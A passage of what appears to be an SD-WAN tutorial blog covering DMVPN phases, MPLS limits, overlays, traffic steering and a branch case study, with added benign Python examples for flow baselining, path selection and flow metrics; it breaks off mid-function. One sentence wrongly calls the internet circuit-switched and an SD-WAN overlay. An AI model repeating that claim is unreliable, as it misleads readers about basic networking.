The optimal route will be the fastest or most efficient and, therefore, preferred to transfer data. Sub-optimal routes will be slower and, hence, not the selected route. Centralized-only designs resulted in suboptimal traffic flow and increased latency, which will degrade application performance.

A key point to note is that traditional networks focus on centralized points in the network that all application, network, and security services must pass through. These network points are fixed and difficult to change.

Network point intelligence

However, the network should be evolved to have network points positioned where it makes the most sense for the application and user. Not based on, let’s say, a previously validated design for a different application era. For example, many branch sites do not have local Internet breakouts.

So, for this reason, we backhauled internet-bound traffic to secure, centralized internet portals at the H.Q. site. As a result, we sacrificed the performance of Internet and cloud applications. Designs that place the H.Q. site at the center of connectivity requirements inhibit the dynamic access requirements for digital business.

Hub and spoke drawbacks.

Simple spoke-type networks are sub-optimal because you always have to go to the center point of the hub and then out to the machine you need rather than being able to go directly to whichever node you need. As a result, the hub becomes a bottleneck in the network as all data must go through it. With a more scattered network using multiple hubs and switches, a less congested and more optimal route could be found between machines.

 

A key point on DMVPN as an overlay technology

DMVPN, an acronym for Dynamic Multipoint Virtual Private Network, is a Cisco solution that builds a scalable hub-and-spoke overlay across the Internet from standard building blocks: multipoint GRE (mGRE) tunnels, the Next Hop Resolution Protocol (NHRP), a dynamic routing protocol, and IPsec. Unlike traditional VPNs, which require a statically configured point-to-point tunnel for every site pair, a DMVPN hub needs a single mGRE interface, and spokes register with it dynamically, so new sites come up without hub reconfiguration.

How DMVPN Works

a) Phase 1: Hub-and-spoke only. Spokes build a GRE tunnel to the hub and register their public (NBMA) address with it using NHRP; the hub uses a single mGRE interface for all spokes. All spoke-to-spoke traffic transits the hub, which is simple but makes the hub a bottleneck.

b) Phase 2: Spoke-to-spoke tunnels. Spokes also use mGRE. When a spoke needs to reach another spoke, it sends an NHRP resolution request to the hub, learns the remote spoke's public address, and builds a direct tunnel. The routing protocol must preserve the original spoke next-hops, so the hub cannot summarize routes toward the spokes.

c) Phase 3: NHRP redirect and shortcut. The hub can now advertise summary or default routes; when it forwards spoke-to-spoke traffic it sends an NHRP redirect, and the spoke installs a shortcut toward the other spoke. This scales to large numbers of spokes and is the model the configuration below uses.

In every phase, IPsec (tunnel protection) is what encrypts and authenticates the GRE traffic. GRE alone is plaintext, so a DMVPN without IPsec is an overlay but not a VPN in the security sense.

Diagram: DMVPN Phase 3 configuration

 

A key point on MPLS agility

Multiprotocol Label Switching, or MPLS, is a forwarding technique that switches packets on short labels rather than performing an IP lookup at every hop. An ingress router classifies a packet and pushes a label; core routers forward on the label alone, and the label-switched path normally follows the IGP's shortest path unless it is traffic-engineered along an explicit route. MPLS is protocol-independent (it carries IPv4, IPv6, Ethernet and more), and while it historically improved forwarding speed, its main value today is in provider VPN services and traffic engineering. It has some drawbacks.

Diagram: MPLS VPN

MPLS topologies are challenging to modify once they are provisioned. Community tagging and matching do provide some degree of flexibility and are commonly used: the customer sets BGP communities on prefixes for specific applications, and the service provider matches those communities to set traffic-engineering attributes such as MED and local preference. However, the network topology itself remains fixed.

Diagram: Networking: The cause of digital transformation.

Connecting remote sites to cloud offerings, such as SaaS or IaaS, is far more efficient over the public Internet; backhauling that traffic to a central data center when it is not required adds latency and load. SD-WAN overlays use mechanisms similar to DMVPN's spoke-to-spoke phases so that branch sites can reach cloud-based applications directly without backhauling to the central H.Q.

Introducing the SD-WAN Overlay

A software-defined wide area network applies software-defined networking principles to the WAN: sites communicate over any transport, including the public Internet, through SD-WAN overlay tunnels, which are encrypted when they carry traffic between an organization's own locations. SD-WAN is software-defined networking for the wide area network.

SD-WAN decouples (separates) the WAN infrastructure, whether physical or virtual, from its control plane mechanism and allows applications or application groups to be placed into virtual WAN overlays.

Types of SD WAN and the SD WAN overlay: The virtual WANs 

The separation allows us to bring many enhancements and improvements to a WAN that has had very little innovation in the past compared to the rest of the infrastructure, such as server and storage modules. With server virtualization, several virtual machines create application isolation on a physical server.

For example, an application placed in a VM operated in isolation from each other, yet the VMs were installed on the same physical hosts.

Consider SD-WAN to operate with similar principles. Each application or group can operate independently when traversing the WAN to endpoints in the cloud or other remote sites. These applications are placed into a virtual SDWAN overlay.

Diagram: Cisco SD-WAN overlay. Source Network Academy

SD-WAN overlay and SDN combined

  • The Fabric

The word fabric reflects the fact that there are many paths between any two servers, which eases load balancing and traffic distribution. SDN centralizes, in an SDN controller, the control logic that decides how flows are distributed over all the fabric paths. The SDN controller can also control several fabrics simultaneously, managing intra- and inter-datacenter flows.

  • SD-WAN overlay includes SDN

SD-WAN is used to control and manage a company's multiple WAN transports: Internet, MPLS, LTE, DSL, fiber, leased circuits, and so on. SD-WAN uses SDN technology to control the entire environment. As in SDN, the data plane and control plane are separated, and a centralized controller manages flows, routing or switching policies, packet priority, network policies, and the like. SD-WAN technology is overlay-based: tunnels between edge nodes form a virtual topology on top of the underlying networks.

  • Centralized logic

In a traditional network, both the transport (forwarding) functions and the control logic are resident on each device, which is why any configuration or change must be done box by box, manually or at most with an Ansible script. SD-WAN brings Software-Defined Networking (SDN) concepts to the enterprise branch WAN.

Software-defined networking (SDN) is an architecture, whereas SD-WAN is a technology that can be purchased and built on SDN’s foundational concepts. SD-WAN’s centralized logic stems from SDN. SDN separates the control from the data plane and uses a central controller to make intelligent decisions, similar to the design that most SD-WAN vendors operate.

  • A holistic view

The controller has a holistic view. Same with the SD-WAN overlay. The controller supports central policy management, enabling network-wide policy definitions and traffic visibility. The SD-WAN edge devices perform the data plane. The data plane is where the simple forwarding occurs, and the control plane, which is separate from the data plane, sets up all the controls for the data plane to forward.

Like SDN, the SD-WAN overlay abstracts network hardware into a control plane with multiple data planes to make up one large WAN fabric. As the control layer is abstracted and decoupled above the physical devices and runs in software, services can be virtualized and delivered from a central location to any point on the network.

Diagram: SD-WAN technology: The old WAN vs the new WAN.

Types of SD WAN and SD-WAN Overlay Features

Enterprises that employ SD-WAN solutions for their network architecture will simplify the complexity of their WAN. Enterprises should look at the SD-WAN options available in various deployment options, ranging from thin devices with most of the functionality in the cloud to thicker devices at the branch location performing most of the work. Whichever SD-WAN vendor you choose will have similar features.

Today’s WAN environment requires us to manage many elements: numerous physical components that include both network and security devices, complex routing protocols and configurations, complex high-availability designs, and various path optimizations and encryption techniques. 

Gaining the SD-WAN benefits

Employing the features discussed below will allow you to gain the benefits of SD-WAN: its higher capacity bandwidth, centralized management, network visibility, and multiple connection types. In addition, SD-WAN technology allows organizations to use connection types that are cheaper than MPLS.

Diagram: SD-WAN features: Virtual Private Network (VPN).

Types of SD WAN: Combining the transports

At its core, SD-WAN shapes and steers application traffic across multiple WAN means of transport. Building on the concept of link bonding, which combines numerous transports and transport types, the SD-WAN overlay improves on it by moving the functionality up the stack. First, SD-WAN aggregates last-mile services, representing them as a single pipe to the application.

SD-WAN allows you to combine all transport links into one big pipe. SD-WAN is transport agnostic. As it works by abstraction, it does not care what transport links you have. Maybe you have MPLS, private Internet, or LTE. It can combine all these or use them separately.

Types of SD WAN: Central location

From a central location, SD-WAN pulls all of these WAN resources together, creating one large WAN fabric that allows administrators to slice up the WAN to match the application requirements that sit on top. Different applications traverse the WAN, so we need the WAN to react differently.

For example, if you’re running a call center, you want low delay, low latency, and high availability for voice traffic. You may wish this traffic to use a path with an excellent service-level agreement.

Diagram: SD-WAN traffic steering. Source Cisco.

Types of SD WAN: Traffic steering

Traffic steering may also be required: for example, moving voice traffic to another path if the first path is experiencing high latency. If it is not possible to steer traffic automatically to a better-performing link, a series of path remediation techniques can be run to try to improve performance. File transfer differs from real-time voice: it can tolerate more delay but needs more bandwidth.

Here, you may want to use a combination of WAN transports (such as customer broadband and LTE) to achieve higher aggregate bandwidth. This also allows you to automatically steer traffic over different WAN transports when there is degradation on one link. With the SD-WAN overlay, we must start thinking about paths, not links.

SD-WAN overlay makes intelligent decisions

At its core, SD-WAN enables real-time application traffic steering over any link, such as broadband, LTE, and MPLS, assigning pre-defined policies based on business intent. Steering policies support many application types, making intelligent decisions about how WAN links are utilized and which paths are taken.

Diagram: Computer networking: Overlay technology.

Types of SD WAN: Steering traffic

The concepts of an underlay and an overlay are not new, and SD-WAN borrows these designs. First, the underlay is the physical or virtual world, such as the physical infrastructure. Then we have the overlay, where all the intelligence can be set. The SDWAN overlay represents the virtual WANs that hold your different applications.

A virtual WAN overlay enables us to steer traffic and combine all bandwidths. Similar to how applications are mapped to VMs in the server world, with SD-WAN, each application is mapped to its own virtual SD-WAN overlay. Each virtual SDWAN overlay can have its own SD WAN security policies, topologies, and performance requirements.

SD-WAN overlay path monitoring

SD-WAN monitors the paths and the application performance on each link (Internet, MPLS, LTE) and then chooses the best path based on real-time conditions and the business policy. In summary, the underlay network is the physical or virtual infrastructure on top of which the overlay network is built. An SDWAN overlay network is a virtual network built on top of an underlying network infrastructure (the underlay).

Types of SD-WAN: Controller-based policy

An additional layer of information is needed to make more intelligent decisions about how and where to forward application traffic. This is the controller-based policy approach that SD-WAN offers, incorporating a holistic view.

A central controller can now make decisions based on global information, not solely on a path-by-path basis with traditional routing protocols.  Getting all the routing information and compiling it into the controller to make a decision is much more efficient than making local decisions that only see a limited part of the network.

The SD-WAN Controller provides physical or virtual device management for all SD-WAN Edges associated with the controller. This includes, but is not limited to, configuration and activation, IP address management, and pushing down policies onto SD-WAN Edges located at the branch sites.

SD-WAN Overlay Case Study

I recently consulted for a private enterprise. Like many enterprises, they have many applications, both legacy and new. No one knew what flows and applications were running over the WAN. Visibility was at an all-time low. For the network design, the HQ has MPLS and Direct Internet access.

So, there is nothing new here, and this design has been in place for the last decade. All traffic is backhauled to the HQ/MPLS headend for security screening. The HQ was where the security stack was located. This included firewalls, IDS/IPS, and anti-malware. The remote sites have high latency and limited connectivity options.

Diagram: WAN transformation: Network design.

More importantly, they are transitioning their ERP system to the cloud. As apps move to the cloud, they want to avoid fixed WAN, a big driver for a flexible SD-WAN solution. They also have remote branches. These branches are hindered by high latency and poorly managed IT infrastructure.

But they don’t want an I.T. representative at each site location. They have heard that SD-WAN has a centralized logic and can view the entire network from one central location. These remote sites must receive large files from the H.Q.; the branch sites’ transport links are only single-customer broadband links.

The cost of remote sites

Some remote sites have LTE, and the bills are growing. The company wants to reduce costs with dedicated Internet access or customer/business broadband. They have heard that you can combine different transports with SD-WAN and apply several path remediations on degraded transports for better performance. So, they decided to roll out SD-WAN. From this new architecture, they gained several benefits.

SD-WAN Visibility

When your business-critical applications operate over different provider networks, it gets harder to troubleshoot and find the root cause of problems. So, visibility is critical to business. SD-WAN allows you to see network performance data in real-time and is essential for determining where packet loss, latency, and jitter are occurring so you can resolve the problem quickly.

You also need to be able to see who or what is consuming bandwidth so you can spot intermittent problems. For all these reasons, SD-WAN visibility needs to go beyond network performance metrics and provide greater insight into the delivery chains that run from applications to users.

Understand your baselines

Visibility is needed to complete the network baseline before the SD-WAN is deployed. This enables the organization to understand existing capabilities, the norm, what applications are running, the number of sites connected, which service providers are used, and whether they’re meeting their SLAs.

Visibility is a critical phase in getting a complete picture so teams understand how to optimize the infrastructure for the business. SD-WAN gives you an intelligent edge so you can see all the traffic and do something with the traffic immediately.

First, look at the visibility of the various flows, the links used, and any issues on those links. Then, if necessary, you can tweak the bonding policy to optimize the traffic flow. Before the rollout of SD-WAN, there was no visibility into the types of traffic or into how much bandwidth each application used. They had limited knowledge of WAN performance.
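One way to turn raw flow records into the baseline described above, as an added example that is not code from the original post or from any SD-WAN vendor. The flow records, the branch name and the link capacities are constructed sample values; in practice the input would come from a NetFlow/IPFIX export or a probe on the WAN edge.

```python
"""Added example: build a pre-rollout WAN baseline from flow records.

Constructed sample data, not the page's or any vendor's own code. The flow
records and link capacities below are made-up values.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class FlowRecord:
    """One exported flow: which link it used, which app it was, how much it sent."""
    site: str          # branch that originated the flow (hypothetical name)
    link: str          # WAN transport the flow used, e.g. "mpls" or "broadband"
    app: str           # application label (from port/protocol or L7 classification)
    bytes_sent: int
    duration_s: float  # length of the observation window for this record


# Constructed flow export for one 60-second window at a hypothetical branch.
SAMPLE_FLOWS: List[FlowRecord] = [
    FlowRecord("branch-a", "mpls", "erp", 30_000_000, 60),
    FlowRecord("branch-a", "mpls", "voice", 6_000_000, 60),
    FlowRecord("branch-a", "mpls", "file-transfer", 120_000_000, 60),
    FlowRecord("branch-a", "broadband", "web", 15_000_000, 60),
    FlowRecord("branch-a", "broadband", "guest-wifi", 3_000_000, 60),
]

# Constructed link capacities in bit/s (10 Mbit/s MPLS, 50 Mbit/s broadband).
LINK_CAPACITY_BPS: Dict[str, int] = {"mpls": 10_000_000, "broadband": 50_000_000}


def per_link_app_bps(flows: List[FlowRecord]) -> Dict[str, Dict[str, float]]:
    """Average bit rate per (link, application) over the observation window."""
    usage: Dict[str, Dict[str, float]] = defaultdict(lambda: defaultdict(float))
    for f in flows:
        usage[f.link][f.app] += f.bytes_sent * 8 / f.duration_s
    return {link: dict(apps) for link, apps in usage.items()}


def link_utilisation(flows: List[FlowRecord], capacity: Dict[str, int]) -> Dict[str, float]:
    """Fraction of each link's capacity consumed; a value above 1.0 means oversubscribed."""
    usage = per_link_app_bps(flows)
    return {link: sum(apps.values()) / capacity[link] for link, apps in usage.items()}


def top_consumers(flows: List[FlowRecord], n: int = 2) -> Dict[str, List[Tuple[str, float]]]:
    """The n applications consuming the most bandwidth on each link."""
    usage = per_link_app_bps(flows)
    return {
        link: sorted(apps.items(), key=lambda kv: kv[1], reverse=True)[:n]
        for link, apps in usage.items()
    }


def oversubscribed_links(flows: List[FlowRecord], capacity: Dict[str, int],
                         threshold: float = 0.8) -> List[str]:
    """Links running at or above the threshold, which the bonding policy should relieve."""
    return sorted(link for link, u in link_utilisation(flows, capacity).items() if u >= threshold)


if __name__ == "__main__":
    print("utilisation:", link_utilisation(SAMPLE_FLOWS, LINK_CAPACITY_BPS))
    print("top consumers:", top_consumers(SAMPLE_FLOWS))
    print("oversubscribed:", oversubscribed_links(SAMPLE_FLOWS, LINK_CAPACITY_BPS))
```

With the constructed numbers the MPLS circuit is carrying roughly twice its capacity, driven by file transfers rather than the ERP traffic the circuit was bought for, while the broadband link sits almost idle. That is exactly the kind of finding a baseline should surface before the bonding policy is written.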

SD-WAN offers higher visibility

With SD-WAN, they have the visibility to control and classify traffic on layer 7 values, such as which URL is being used and which domain is being requested, along with the standard port and protocol.

All applications are not equal; some run better on different links. If a particular application is not performing correctly, you can route to a different circuit. With the SD-WAN orchestrator, you have complete visibility across all locations, all links, and into the different traffic across all circuits. 

SD-WAN High Availability

The goal of any high-availability solution is to ensure that all network services are resilient to failure. Such a solution aims to provide continuous access to network resources by addressing the potential causes of downtime through functionality, design, and best practices.

The previous high-availability design was active and passive with manual failover. It was hard to maintain, and there was a lot of unused bandwidth. Now, they have more efficient use of resources and are no longer tied to the bandwidth of the first circuit.

There is a better, more granular application failover mechanism. You can also select which apps are prioritized if there is a link failure or when a certain congestion ratio is hit. For example, you may have LTE as a backup, which can be very expensive. So applications marked high priority are steered over the backup link, but guest Wi-Fi traffic is not.

Flexible topology

Before, they had a hub and spoke MPLS design for all applications. They wanted a full mesh architecture for some applications and to keep the existing hub and spoke for others. However, the service provider couldn’t accommodate the level of granularity that they wanted.

Now, with SD-WAN, they can choose topologies that are better suited to the application type. As a result, the network design is now more flexible and matches the application, rather than the application having to match a network design that does not suit it.

Diagram: SD-WAN Topologies.

Going Deeper on the SD-WAN Overlay Components

SD-WAN combines transports, SDWAN overlay, and underlay

Look at it this way. With an SD-WAN topology, there are different levels of networking. There is an underlay network, the physical infrastructure, and an SDWAN overlay network. The physical infrastructure is the routers, switches, and WAN transports; the overlay network is the virtual WAN overlays.

The SDWAN overlay presents a different network to the application. For example, the voice application will see only the voice overlay. The logical virtual pipe that the overlay creates, and that the application sees, differs from the underlay.

An SDWAN overlay network is a virtual or logical network created on top of an existing physical network. The internet, which connects many nodes via circuit switching, is an example of an SDWAN overlay network. An overlay network is any virtual layer on top of physical network infrastructure.

Consider an SDWAN overlay as a flexible tag.

This may be as simple as a virtual local area network (VLAN) but typically refers to more complex virtual layers from an SDN or an SD-WAN. Think of an SDWAN overlay as a tag, so building the overlays is not expensive or time-consuming. In addition, you don’t need to buy physical equipment for each overlay, as the overlay is virtualized and lives in software.

Similar to software-defined networking (SDN), the critical part is that SD-WAN works by abstraction. All the complexities are abstracted into application overlays. For example, application type A can use this SDWAN overlay, and application type B can use that SDWAN overlay. 

I.P. and port number, orchestrations, and end-to-end

Recent application requirements drive a new type of WAN that more accurately supports today’s environment with an additional layer of policy management. The world has moved away from using IP addresses and port numbers to identify applications and make the forwarding decision.

Types of SD WAN

The market for branch office wide-area network functionality is shifting from dedicated routing, security, and WAN optimization appliances to feature-rich SD-WAN. As a result, WAN edge infrastructure now incorporates a widening set of network functions, including secure routers, firewalls, SD-WAN, WAN path control, and WAN optimization, along with traditional routing functionality. Therefore, consider the following approach to deploying SD-WAN.

SD-WAN overlay approach and the features it relies on:

  • Application-orientated WAN

  • Holistic visibility and decisions

  • Central logic

  • Independent topologies

  • Application mapping

1. Application-based approach

With SD-WAN, we are shifting from a network-based approach to an application-based approach. The new WAN no longer looks solely at the network to forward packets. Instead, it looks at the business requirements and decides how to optimize the application with the correct forwarding behavior. This new way of forwarding would be problematic when using traditional WAN architectures.

Making business logic decisions with I.P. and port number information is challenging. Standard routing is the most common way to forward application traffic today, but it only assesses part of the picture when making its forwarding decision. 

These devices have routing tables to perform forwarding. Still, with this model, they operate and decide on their little island, losing the holistic view required for accurate end-to-end decision-making.  

2. SD-WAN: Holistic decision

The WAN must start to make decisions holistically. The WAN should not be viewed as a single module in the network design. Instead, it must incorporate several elements it has not incorporated to capture the correct per-application forwarding behavior. The ideal WAN should be automatable to form a comprehensive end-to-end solution centrally orchestrated from a single pane of glass.

Managed and orchestrated centrally, this new WAN fabric is transport agnostic. It offers application-aware routing, regional-specific routing topologies, encryption on all transports regardless of link type, and high availability with automatic failover. All of these will be discussed shortly and are the essence of SD-WAN.  

3. SD-WAN and central logic        

Besides the virtual SD-WAN overlay, another key SD-WAN concept is centralized logic. Upon examining a standard router, local routing tables are computed from an algorithm to forward a packet to a given destination.

It receives routes from its peers or neighbors but computes paths locally and makes local routing decisions. The critical point to note is that everything is calculated locally. SD-WAN functions on a different paradigm.

Rather than using distributed logic, it utilizes centralized logic. This allows you to view the entire network holistically, with a distributed forwarding plane that makes real-time decisions based on better metrics than before.

This paradigm enables SD-WAN to see how the flows behave along the path. This is because they are taking the fragmented control approach and centralizing it while benefiting from a distributed system. 

The SD-WAN controller, which acts as the brain, can set different applications to run over different paths based on business requirements and performance SLAs, not on a fixed topology. So, for example, if one path does not have acceptable packet loss and latency is high, we can move to another path dynamically.

4. Independent topologies

SD-WAN has different levels of networking and brings the concepts of SDN into the Wide Area Network. Similar to SDN, we have an underlay and an overlay network with SD-WAN. The WAN infrastructure, either physical or virtual, is the underlay, and the SDWAN overlay is in software on top of the underlay where the applications are mapped.

This decoupling or separation of functions allows different application or group overlays. Previously, the application had to work with a fixed and pre-built network infrastructure. With SD-WAN, the application can choose the type of topology it wants, such as a full mesh or hub and spoke. The topologies with SD-WAN are much more flexible.

A key point: SD-WAN abstracts the underlay

With SD-WAN, the virtual WAN overlays are abstracted from the physical device’s underlay. Therefore, the virtual WAN overlays can take on topologies independent of each other without being pinned to the configuration of the underlay network. SD-WAN changes how you map application requirements to the network, allowing for the creation of independent topologies per application.

For example, mission-critical applications may use expensive leased lines, while lower-priority applications can use inexpensive best-effort Internet links. This can all change on the fly if specific performance metrics are unmet.

Previously, the application had to match and “fit” into the network with the legacy WAN, but with an SD-WAN, the application now controls the network topology. Multiple independent topologies per application are a crucial driver for SD-WAN.

types of sd wan
Diagram: SD-WAN Link Bonding.

5. The SD-WAN overlay

SD-WAN optimizes traffic over multiple available connections. It dynamically steers traffic to the best available link. Suppose the available links show any transmission issues. In that case, it will immediately transfer to a better path or apply remediation to a link if, for example, you only have a single link. SD-WAN delivers application flows from a source to a destination based on the configured policy and the best available network path. A core concept of SD-WAN is the overlay.

SD-WAN solutions provide the software abstraction to create the SD-WAN overlay and decouple network software services from the underlying physical infrastructure. Multiple virtual overlays may be defined to abstract the underlying physical transport services, each supporting a different quality of service, preferred transport, and high availability characteristics.

6. Application mapping

Application mapping also allows you to steer traffic over different WAN transports. This steering is automatic and can be implemented when specific performance metrics are unmet. For example, if Internet transport has a 15% packet loss, the policy can be set to steer all or some of the application traffic over to better-performing MPLS transport.

Applications are mapped to different overlays based on business intent, not infrastructure details like IP addresses. When you think about overlays, it’s common to have, on average, four overlays. For example, you may have a gold, platinum, and bronze SDWAN overlay, and then you can map the applications to these overlays.

The applications will have different networking requirements, and overlays allow you to slice and dice your network if you have multiple application types. 
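The controller-side decision that the steering, failover and application-mapping sections above describe, as an added example that is not code from the original post or from any SD-WAN vendor. The overlay names, SLA thresholds, transport names and probe values are constructed; the scenarios reproduce the cases discussed in the text: a healthy network, an Internet transport with 15% packet loss, and both wired transports down so that only a metered LTE backup remains, which the guest Wi-Fi overlay is not allowed to use.

```python
"""Added example: a controller-side path selection routine for application steering.

Constructed illustration code, not the page's or any SD-WAN vendor's
implementation. Transport names, SLA thresholds and probe values are made up.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class PathMetrics:
    """Latest probe results for one WAN transport, as the controller sees them."""
    name: str
    transport: str        # "mpls", "internet" or "lte"
    latency_ms: float
    jitter_ms: float
    loss_pct: float
    up: bool = True


@dataclass
class AppPolicy:
    """Business-intent policy for one application, mapped to an overlay."""
    app: str
    overlay: str                # e.g. "platinum", "gold", "bronze"
    max_latency_ms: float
    max_jitter_ms: float
    max_loss_pct: float
    allowed: List[str]          # transports this overlay may use, in preference order


def meets_sla(path: PathMetrics, policy: AppPolicy) -> bool:
    """True if the path currently satisfies the overlay's SLA thresholds."""
    return (path.up
            and path.latency_ms <= policy.max_latency_ms
            and path.jitter_ms <= policy.max_jitter_ms
            and path.loss_pct <= policy.max_loss_pct)


def select_path(policy: AppPolicy, paths: List[PathMetrics]) -> Optional[PathMetrics]:
    """Pick the first preferred transport that meets the SLA.

    If none does (a brown-out rather than an outage), fall back to the
    least-degraded allowed path instead of dropping traffic. Transports outside
    policy.allowed (e.g. metered LTE for guest traffic) are never used.
    """
    usable = [p for p in paths if p.up and p.transport in policy.allowed]
    for transport in policy.allowed:
        for p in usable:
            if p.transport == transport and meets_sla(p, policy):
                return p
    if not usable:
        return None
    return min(usable, key=lambda p: (p.loss_pct, p.latency_ms, p.jitter_ms))


# Constructed policies: LTE is listed last so it only serves as a backup, and
# the bronze guest overlay is confined to the Internet transport.
POLICIES = [
    AppPolicy("voice", "platinum", 150, 30, 1.0, ["mpls", "internet", "lte"]),
    AppPolicy("erp", "gold", 300, 50, 2.0, ["internet", "mpls", "lte"]),
    AppPolicy("guest-wifi", "bronze", 1000, 200, 10.0, ["internet"]),
]


def steer_all(paths: List[PathMetrics], policies=POLICIES) -> Dict[str, Optional[str]]:
    """Controller decision table: application -> chosen path name (None = no path)."""
    decisions: Dict[str, Optional[str]] = {}
    for pol in policies:
        chosen = select_path(pol, paths)
        decisions[pol.app] = chosen.name if chosen else None
    return decisions


# Constructed probe snapshots for three situations.
HEALTHY = [
    PathMetrics("mpls-1", "mpls", 40, 2, 0.0),
    PathMetrics("dia-1", "internet", 60, 5, 0.1),
    PathMetrics("lte-1", "lte", 90, 20, 0.5),
]
# Internet transport suffering 15% loss, as in the application-mapping example.
LOSSY_INTERNET = [
    PathMetrics("mpls-1", "mpls", 40, 2, 0.0),
    PathMetrics("dia-1", "internet", 60, 5, 15.0),
    PathMetrics("lte-1", "lte", 90, 20, 0.5),
]
# Both wired transports down: only the metered LTE backup remains.
WIRED_OUTAGE = [
    PathMetrics("mpls-1", "mpls", 40, 2, 0.0, up=False),
    PathMetrics("dia-1", "internet", 60, 5, 0.1, up=False),
    PathMetrics("lte-1", "lte", 90, 20, 0.5),
]

if __name__ == "__main__":
    for label, snapshot in [("healthy", HEALTHY), ("lossy internet", LOSSY_INTERNET),
                            ("wired outage", WIRED_OUTAGE)]:
        print(label, steer_all(snapshot))
```

Two design points are worth noting. The fallback branch matters: when every allowed path breaches its SLA, the controller still has to choose something, and choosing the least-degraded path is what keeps a brown-out from becoming an outage. And the per-overlay allowed list is how "high-priority apps may use LTE, guest traffic may not" becomes enforceable policy rather than a convention.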

Diagram: Technology design: SDWAN overlay application mapping.

SD-WAN & WAN metrics

SD-WAN captures metrics that go far beyond the standard WAN measurements. For example, the traditional way would measure packet loss, latency, and jitter to determine path quality. These measurements are insufficient, and routing protocols only make the packet-forwarding decision at layer 3 of the OSI model.

As we know, layer 3 of the OSI model lacks intelligence and misses the overall user experience. Rather than relying on bits, bytes, jitter, and latency, we must start to look at the application transactions.

SD-WAN incorporates better metrics that go beyond those considered by a standard WAN edge router. These metrics may include application response time, network transfer, and service response time. Some SD-WAN solutions monitor each flow’s RTT, sliding windows, and ACK delays, not just the I.P. or TCP. This creates a more accurate view of the application’s performance.
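A small passive flow monitor showing the metrics this section lists (handshake RTT, ACK delay, server response time and transfer time) and why they separate a slow application from a slow path. This is an added example, not code from the original post or from any vendor; the event timelines and the thresholds in diagnose() are constructed, and a real monitor would derive the events from the TCP segments seen at the SD-WAN edge.

```python
"""Added example: per-flow application metrics that a layer-3 view cannot give.

Constructed illustration, not the page's or any vendor's code. The packet
timelines below are made up; in practice the events would come from a TCP
flow monitor on the SD-WAN edge.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Event:
    """One observed packet-level event on a flow, with a capture timestamp in ms."""
    t_ms: float
    flow: str
    kind: str   # "syn", "synack", "req_end", "resp_start", "resp_end", "data", "ack"


def flow_metrics(events: List[Event]) -> Dict[str, Dict[str, float]]:
    """Derive handshake RTT, server response time, transfer time and ACK delay per flow."""
    by_flow: Dict[str, List[Event]] = {}
    for e in sorted(events, key=lambda ev: ev.t_ms):
        by_flow.setdefault(e.flow, []).append(e)

    out: Dict[str, Dict[str, float]] = {}
    for flow, evs in by_flow.items():
        t = {e.kind: e.t_ms for e in evs if e.kind not in ("data", "ack")}
        rtt = t["synack"] - t["syn"]              # network round trip from the TCP handshake
        server = t["resp_start"] - t["req_end"]   # time the server took to start answering
        transfer = t["resp_end"] - t["resp_start"]  # time the response body spent on the wire
        # Average delay between a data segment and the ACK that covers it.
        delays, pending = [], None
        for e in evs:
            if e.kind == "data":
                pending = e.t_ms
            elif e.kind == "ack" and pending is not None:
                delays.append(e.t_ms - pending)
                pending = None
        out[flow] = {
            "handshake_rtt_ms": rtt,
            "server_response_ms": server,
            "transfer_ms": transfer,
            "avg_ack_delay_ms": sum(delays) / len(delays) if delays else 0.0,
        }
    return out


def diagnose(m: Dict[str, float]) -> str:
    """Attribute slowness to the application or the network (constructed thresholds)."""
    if m["server_response_ms"] > 100 and m["server_response_ms"] >= 2 * m["handshake_rtt_ms"]:
        return "application"   # the path is fine; the server is slow to answer
    if m["handshake_rtt_ms"] > 100 or m["avg_ack_delay_ms"] > 50 or m["transfer_ms"] > 500:
        return "network"       # path latency or loss recovery dominates
    return "healthy"


# Constructed timelines: erp-1 has a fast path but a slow server, erp-2 has a
# slow and lossy path, web-1 is healthy.
SAMPLE_EVENTS = [
    Event(0, "erp-1", "syn"), Event(40, "erp-1", "synack"),
    Event(45, "erp-1", "req_end"), Event(545, "erp-1", "resp_start"),
    Event(560, "erp-1", "data"), Event(580, "erp-1", "ack"), Event(600, "erp-1", "resp_end"),
    Event(0, "erp-2", "syn"), Event(180, "erp-2", "synack"),
    Event(190, "erp-2", "req_end"), Event(200, "erp-2", "resp_start"),
    Event(210, "erp-2", "data"), Event(420, "erp-2", "ack"), Event(900, "erp-2", "resp_end"),
    Event(0, "web-1", "syn"), Event(30, "web-1", "synack"),
    Event(32, "web-1", "req_end"), Event(52, "web-1", "resp_start"),
    Event(55, "web-1", "data"), Event(70, "web-1", "ack"), Event(90, "web-1", "resp_end"),
]


def diagnose_all(events: List[Event]) -> Dict[str, str]:
    """Flow name -> verdict, the view an SD-WAN edge would report per application."""
    return {flow: diagnose(m) for flow, m in flow_metrics(events).items()}


if __name__ == "__main__":
    for flow, m in flow_metrics(SAMPLE_EVENTS).items():
        print(flow, m, diagnose(m))
```

The point of the two ERP flows is that a loss/latency probe would rate erp-1's path as excellent and still leave users complaining; only the gap between the end of the request and the start of the response shows that the server, not the WAN, is the problem. Steering erp-1 to another transport would change nothing, while steering erp-2 would.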

SD-WAN Features and Benefits

      • Leverage all available connectivity types.

All SD-WAN vendors can balance traffic across all transports regardless of transport type, which can be done per flow or per packet. This ensures that redundant links are not left sitting idle. SD-WAN creates an active-active network and eliminates the need to use and maintain traditional routing protocols for active–standby setups.
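The difference between the two balancing modes named above, per flow and per packet, as an added example that is not code from the original post or from any vendor. Link names and weights are constructed; the weighting assumes the broadband link has four times the capacity of the MPLS circuit.

```python
"""Added example: per-flow versus per-packet balancing over active-active transports.

Constructed illustration, not the page's or any vendor's code. Link names,
weights and the sample flows are made up.
"""
import hashlib
from itertools import cycle
from typing import Dict, List, Tuple

# A flow is identified by its 5-tuple.
Flow = Tuple[str, str, int, int, str]   # src_ip, dst_ip, src_port, dst_port, proto


def flow_hash(flow: Flow) -> int:
    """Stable hash of the 5-tuple so the same flow always lands on the same link."""
    key = "|".join(str(field) for field in flow).encode()
    return int.from_bytes(hashlib.sha256(key).digest()[:8], "big")


def per_flow_pick(flow: Flow, weights: Dict[str, int]) -> str:
    """Weighted per-flow balancing: each link gets as many hash slots as its weight.

    Keeping a flow on one link preserves packet ordering, which TCP and
    real-time voice both care about.
    """
    slots = [link for link in sorted(weights) for _ in range(weights[link])]
    return slots[flow_hash(flow) % len(slots)]


def per_packet_spray(n_packets: int, links: List[str]) -> List[str]:
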